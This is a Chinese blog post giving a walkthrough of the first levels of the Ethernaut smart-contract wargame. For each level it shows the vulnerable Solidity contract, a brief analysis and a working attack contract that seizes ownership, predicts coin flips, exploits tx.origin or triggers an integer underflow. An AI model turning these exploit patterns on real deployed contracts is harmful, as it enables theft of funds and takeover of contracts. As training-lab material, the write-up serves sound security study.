<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="https://raw.githubusercontent.com/bcYng-w/images/main/32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="https://raw.githubusercontent.com/bcYng-w/images/main/16x16.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":4},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="Ethernaut刷题上">
<meta property="og:type" content="article">
<meta property="og:title" content="Ethernaut靶场刷题part1">
<meta property="og:url" content="http://example.com/2022/03/19/ethernaut%E9%9D%B6%E5%9C%BA%E5%88%B7%E9%A2%98%E4%B8%8A/index.html">
<meta property="og:site_name" content="until">
<meta property="og:description" content="Ethernaut刷题上">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://storage.tttang.com/media/attachment/2022/04/08/271ca887-92a2-4810-8b71-8e60a2aa1f95.png">
<meta property="og:image" content="https://storage.tttang.com/media/attachment/2022/04/08/736d2070-9614-4bf2-8a15-7abd5b1864f7.png">
<meta property="og:image" content="https://storage.tttang.com/media/attachment/2022/04/08/01e70a02-577a-4100-95bc-5201d17f18f5.png">
<meta property="og:image" content="https://storage.tttang.com/media/attachment/2022/04/08/16d5f4a3-eee1-41d9-be37-72e59794ccf9.png">
<meta property="og:image" content="https://storage.tttang.com/media/attachment/2022/04/08/be0e64d5-9233-474c-b27d-22e49fa36ac7.png">
<meta property="og:image" content="https://storage.tttang.com/media/attachment/2022/04/08/748d8dc2-c3c5-45e9-9c80-33936f46043d.png">
<meta property="og:image" content="https://storage.tttang.com/media/attachment/2022/04/08/b5974b3f-e34a-4d64-a2b4-d20f0666d40d.png">
<meta property="og:image" content="https://storage.tttang.com/media/attachment/2022/04/08/b9fdad65-5bf9-4bb4-bd2c-9c75e0916166.png">
<meta property="og:image" content="https://storage.tttang.com/media/attachment/2022/04/08/2a90113e-a2c0-4a57-9f90-1e827d50c6bd.png">
<meta property="og:image" content="https://storage.tttang.com/media/attachment/2022/04/08/b0f94b2b-ba04-4413-8316-6e963ff74339.png">
<meta property="og:image" content="https://storage.tttang.com/media/attachment/2022/04/08/47eb5c7e-35f3-4776-9037-84c4b22f27fc.png">
<meta property="article:published_time" content="2022-03-18T16:34:03.852Z">
<meta property="article:modified_time" content="2022-04-08T15:26:25.256Z">
<meta property="article:author" content="bcYng">
<meta property="article:tag" content="区块链">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://storage.tttang.com/media/attachment/2022/04/08/271ca887-92a2-4810-8b71-8e60a2aa1f95.png">

<link rel="canonical" href="http://example.com/2022/03/19/ethernaut%E9%9D%B6%E5%9C%BA%E5%88%B7%E9%A2%98%E4%B8%8A/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Ethernaut靶场刷题part1 | until</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">until</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/03/19/ethernaut%E9%9D%B6%E5%9C%BA%E5%88%B7%E9%A2%98%E4%B8%8A/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://raw.githubusercontent.com/bcYng-w/images/main/touxaing.png">
      <meta itemprop="name" content="bcYng">
      <meta itemprop="description" content="前程似锦">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="until">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Ethernaut靶场刷题part1
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-03-19 00:34:03" itemprop="dateCreated datePublished" datetime="2022-03-19T00:34:03+08:00">2022-03-19</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-04-08 23:26:25" itemprop="dateModified" datetime="2022-04-08T23:26:25+08:00">2022-04-08</time>
              </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>Ethernaut刷题上</p>
<span id="more"></span>

<h1 id="1-fallback"><a href="#1-fallback" class="headerlink" title="1.fallback"></a>1.fallback</h1><p>题目要求：获得合约所有权并将余额变成0</p>
<h2 id="Code"><a href="#Code" class="headerlink" title="Code"></a>Code</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.6.0;</span><br><span class="line"></span><br><span class="line">import &#x27;@openzeppelin/contracts/math/SafeMath.sol&#x27;;</span><br><span class="line"></span><br><span class="line">contract Fallback &#123;</span><br><span class="line"></span><br><span class="line">  using SafeMath for uint256;</span><br><span class="line">  mapping(address =&gt; uint) public contributions;</span><br><span class="line">  address payable public owner;</span><br><span class="line"></span><br><span class="line">  constructor() public &#123;</span><br><span class="line">    owner = msg.sender;</span><br><span class="line">    contributions[msg.sender] = 1000 * (1 ether);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  modifier onlyOwner &#123;</span><br><span class="line">        require(</span><br><span class="line">            msg.sender == owner,</span><br><span class="line">            &quot;caller is not the owner&quot;</span><br><span class="line">        );</span><br><span class="line">        _;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">  function contribute() public payable &#123;</span><br><span class="line">    require(msg.value &lt; 0.001 ether);</span><br><span class="line">    contributions[msg.sender] += msg.value;</span><br><span class="line">    if(contributions[msg.sender] &gt; contributions[owner]) &#123;</span><br><span class="line">      owner = msg.sender;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function getContribution() public view returns (uint) &#123;</span><br><span class="line">    return contributions[msg.sender];</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function withdraw() public onlyOwner &#123;</span><br><span class="line">    owner.transfer(address(this).balance);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  receive() external payable &#123;</span><br><span class="line">    require(msg.value &gt; 0 &amp;&amp; contributions[msg.sender] &gt; 0);</span><br><span class="line">    owner = msg.sender;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Analyze"><a href="#Analyze" class="headerlink" title="Analyze"></a>Analyze</h2><p>存在，接受转账后触发fallback函数，题目合约中的receive函数</p>
<h2 id="Attack"><a href="#Attack" class="headerlink" title="Attack"></a>Attack</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.6.0;</span><br><span class="line">import &quot;e1.sol&quot;;</span><br><span class="line">contract attack &#123;</span><br><span class="line">    Fallback public e;</span><br><span class="line">    address payable a = 0xd9145CCE52D386f254917e481eB44e9943F39138;</span><br><span class="line">    constructor(address payable fallbackaddress) public payable&#123;e=Fallback(fallbackaddress);&#125;</span><br><span class="line">    function getcontribution() public &#123;</span><br><span class="line">       e.contribute&#123;value:0.0001 ether&#125;();</span><br><span class="line">    &#125;</span><br><span class="line">    function changeowner() public &#123;</span><br><span class="line">        a.call&#123;value:0.0001 ether&#125;(&quot;&quot;);</span><br><span class="line">        //a.send(0.0001 ether);</span><br><span class="line">    &#125;</span><br><span class="line">    function getmoney() public&#123;</span><br><span class="line">        e.withdraw();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h1 id="2-fallout"><a href="#2-fallout" class="headerlink" title="2.fallout"></a>2.fallout</h1><p>题目要求：获得以下合约的所有权</p>
<h2 id="Code-1"><a href="#Code-1" class="headerlink" title="Code"></a>Code</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.6.0;</span><br><span class="line"></span><br><span class="line">contract Fallout &#123;</span><br><span class="line">  mapping (address =&gt; uint) allocations;</span><br><span class="line">  address payable public owner;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">  /* constructor */</span><br><span class="line">  function Fal1out() public payable &#123;</span><br><span class="line">    owner = msg.sender;</span><br><span class="line">    allocations[owner] = msg.value;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  modifier onlyOwner &#123;</span><br><span class="line">	        require(</span><br><span class="line">	            msg.sender == owner,</span><br><span class="line">	            &quot;caller is not the owner&quot;</span><br><span class="line">	        );</span><br><span class="line">	        _;</span><br><span class="line">	    &#125;</span><br><span class="line"></span><br><span class="line">  function allocate() public payable &#123;</span><br><span class="line">    allocations[msg.sender] = allocations[msg.sender]+(msg.value);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function sendAllocation(address payable allocator) public &#123;</span><br><span class="line">    require(allocations[allocator] &gt; 0);</span><br><span class="line">    allocator.transfer(allocations[allocator]);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function collectAllocations() public onlyOwner &#123;</span><br><span class="line">    msg.sender.transfer(address(this).balance);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function allocatorBalance(address allocator) public view returns (uint) &#123;</span><br><span class="line">    return allocations[allocator];</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Analyze-1"><a href="#Analyze-1" class="headerlink" title="Analyze"></a>Analyze</h2><p>Fal1out()函数没有进行onlyowner限制，只要调用即可获得更改owner</p>
<h2 id="Attack-1"><a href="#Attack-1" class="headerlink" title="Attack"></a>Attack</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.6.0;</span><br><span class="line">import &quot;e2.sol&quot;;</span><br><span class="line">contract attack&#123;</span><br><span class="line">    Fallout public e;</span><br><span class="line">    constructor (address payable falloutaddress)public payable &#123;e=Fallout(falloutaddress);&#125;</span><br><span class="line">    function getowner() public&#123;</span><br><span class="line">        e.Fal1out&#123;value:1 wei&#125;();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h1 id="2-coin-flip"><a href="#2-coin-flip" class="headerlink" title="2.coin flip"></a>2.coin flip</h1><p>题目要求：这是一个掷硬币的游戏，你需要连续的猜对结果。完成这一关，你需要通过你的超能力来连续猜对十次。</p>
<h2 id="Code-2"><a href="#Code-2" class="headerlink" title="Code"></a>Code</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">// SPDX-License-Identifier: MIT</span><br><span class="line">pragma solidity ^0.6.0;</span><br><span class="line"></span><br><span class="line">import &#x27;@openzeppelin/contracts/math/SafeMath.sol&#x27;;</span><br><span class="line"></span><br><span class="line">contract CoinFlip &#123;</span><br><span class="line"></span><br><span class="line">  using SafeMath for uint256;</span><br><span class="line">  uint256 public consecutiveWins;</span><br><span class="line">  uint256 lastHash;</span><br><span class="line">  uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;</span><br><span class="line"></span><br><span class="line">  constructor() public &#123;</span><br><span class="line">    consecutiveWins = 0;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function flip(bool _guess) public returns (bool) &#123;</span><br><span class="line">    uint256 blockValue = uint256(blockhash(block.number.sub(1)));</span><br><span class="line"></span><br><span class="line">    if (lastHash == blockValue) &#123;</span><br><span class="line">      revert();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    lastHash = blockValue;</span><br><span class="line">    uint256 coinFlip = blockValue.div(FACTOR);</span><br><span class="line">    bool side = coinFlip == 1 ? true : false;</span><br><span class="line"></span><br><span class="line">    if (side == _guess) &#123;</span><br><span class="line">      consecutiveWins++;</span><br><span class="line">      return true;</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">      consecutiveWins = 0;</span><br><span class="line">      return false;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Analyze-2"><a href="#Analyze-2" class="headerlink" title="Analyze"></a>Analyze</h2><p><img src="https://storage.tttang.com/media/attachment/2022/04/08/271ca887-92a2-4810-8b71-8e60a2aa1f95.png" alt="image.png"></p>
<p><strong>以太坊每14秒产生一个区块，所以block.number是当前的区块，在这个时间段的交易会被打包进这个区块所以我们可以计算题目中的blockvalue</strong></p>
<p>因为有if (lastHash &#x3D;&#x3D; blockValue)的限制，所以连续多次调用可能会失败</p>
<h2 id="Attack-2"><a href="#Attack-2" class="headerlink" title="Attack"></a>Attack</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.6.0;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">contract CoinFlip &#123;</span><br><span class="line"></span><br><span class="line">  function flip(bool _guess) public returns (bool) &#123;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line">contract attack &#123;</span><br><span class="line">    CoinFlip constant private target = CoinFlip(0x8732271d55EA7cb0B28492932fabE9cE2eD06F83);</span><br><span class="line">    function pwn() public&#123;</span><br><span class="line">          uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;</span><br><span class="line">          uint256 blockValue=uint (blockhash(block.number-1));</span><br><span class="line">          uint256 coinFlip = blockValue/FACTOR;</span><br><span class="line">          bool side = coinFlip == 1 ? true : false;</span><br><span class="line">          target.flip(side);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://storage.tttang.com/media/attachment/2022/04/08/736d2070-9614-4bf2-8a15-7abd5b1864f7.png" alt="image.png"></p>
<h1 id="4-Telephone"><a href="#4-Telephone" class="headerlink" title="4.Telephone"></a>4.Telephone</h1><p>题目要求：将owner变成自己</p>
<h2 id="Code-3"><a href="#Code-3" class="headerlink" title="Code"></a>Code</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.6.0;</span><br><span class="line"></span><br><span class="line">contract Telephone &#123;</span><br><span class="line"></span><br><span class="line">  address public owner;</span><br><span class="line"></span><br><span class="line">  constructor() public &#123;</span><br><span class="line">    owner = msg.sender;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function changeOwner(address _owner) public &#123;</span><br><span class="line">    if (tx.origin != msg.sender) &#123;</span><br><span class="line">      owner = _owner;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Analyze-3"><a href="#Analyze-3" class="headerlink" title="Analyze"></a>Analyze</h2><p><img src="https://storage.tttang.com/media/attachment/2022/04/08/01e70a02-577a-4100-95bc-5201d17f18f5.png" alt="image.png"></p>
<p>没什么难点主要就是区分msg.sender和tx.origin的区别。在一个简单的调用链A&gt;B&gt;C&gt;D中如果D内的全局变量为msg.sender它将指向最近一笔的交易地址，也就是C；如果D内的全局变量是tx.orgin，它就会指向最初发送交易的地址，也就是A</p>
<h2 id="Attack-3"><a href="#Attack-3" class="headerlink" title="Attack"></a>Attack</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">contract Attack &#123;</span><br><span class="line">    Telephone constant private target = Telephone(0x6F28D4210D178F6B37bFBe8D1dD8b08402EaC12a);</span><br><span class="line">    function hack() public &#123;</span><br><span class="line">        target.changeOwner(msg.sender);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h1 id="5-Token"><a href="#5-Token" class="headerlink" title="5.Token"></a>5.Token</h1><p>题目要求：这一关的目标是攻破下面这个基础 token 合约，你最开始有20个 token, 如果你通过某种方法可以增加你手中的 token 数量,你就可以通过这一关,当然越多越好</p>
<h2 id="Code-4"><a href="#Code-4" class="headerlink" title="Code"></a>Code</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.6.0;</span><br><span class="line"></span><br><span class="line">contract Token &#123;</span><br><span class="line"></span><br><span class="line">  mapping(address =&gt; uint) balances;</span><br><span class="line">  uint public totalSupply;</span><br><span class="line"></span><br><span class="line">  constructor(uint _initialSupply) public &#123;</span><br><span class="line">    balances[msg.sender] = totalSupply = _initialSupply;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function transfer(address _to, uint _value) public returns (bool) &#123;</span><br><span class="line">    require(balances[msg.sender] - _value &gt;= 0);</span><br><span class="line">    balances[msg.sender] -= _value;</span><br><span class="line">    balances[_to] += _value;</span><br><span class="line">    return true;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function balanceOf(address _owner) public view returns (uint balance) &#123;</span><br><span class="line">    return balances[_owner];</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">contract attack&#123;</span><br><span class="line">    Token constant private target = Token(0x54101E29C84002f75B5c2378e43A56D6174460A8);</span><br><span class="line">    function hack(address to,uint value) public &#123;</span><br><span class="line">        target.transfer(to,value);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Analyze-4"><a href="#Analyze-4" class="headerlink" title="Analyze"></a>Analyze</h2><p>整数溢出漏洞，transfer函数的value可控，构造下溢即可</p>
<h2 id="Attack-4"><a href="#Attack-4" class="headerlink" title="Attack"></a>Attack</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.6.0;</span><br><span class="line"></span><br><span class="line">contract Token &#123;</span><br><span class="line"></span><br><span class="line">  mapping(address =&gt; uint) balances;</span><br><span class="line">  uint public totalSupply;</span><br><span class="line"></span><br><span class="line">  constructor(uint _initialSupply) public &#123;</span><br><span class="line">    balances[msg.sender] = totalSupply = _initialSupply;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function transfer(address _to, uint _value) public returns (bool) &#123;</span><br><span class="line">    require(balances[msg.sender] - _value &gt;= 0);</span><br><span class="line">    balances[msg.sender] -= _value;</span><br><span class="line">    balances[_to] += _value;</span><br><span class="line">    return true;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function balanceOf(address _owner) public view returns (uint balance) &#123;</span><br><span class="line">    return balances[_owner];</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">contract attack&#123;</span><br><span class="line">    Token constant private target = Token(0x54101E29C84002f75B5c2378e43A56D6174460A8);</span><br><span class="line">    function hack(address to,uint value) public &#123;</span><br><span class="line">        target.transfer(to,value);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<h1 id="6-Vault"><a href="#6-Vault" class="headerlink" title="6.Vault"></a>6.Vault</h1><p>题目要求：打开 vault 来通过这一关!</p>
<h2 id="Code-5"><a href="#Code-5" class="headerlink" title="Code"></a>Code</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.6.0;</span><br><span class="line"></span><br><span class="line">contract Vault &#123;</span><br><span class="line">  bool public locked;</span><br><span class="line">  bytes32 private password;</span><br><span class="line"></span><br><span class="line">  constructor(bytes32 _password) public &#123;</span><br><span class="line">    locked = true;</span><br><span class="line">    password = _password;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function unlock(bytes32 _password) public &#123;</span><br><span class="line">    if (password == _password) &#123;</span><br><span class="line">      locked = false;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Analyze-5"><a href="#Analyze-5" class="headerlink" title="Analyze"></a>Analyze</h2><p>事先了解变量存储机制，得知password存储在slot1（bool占据slot0）</p>
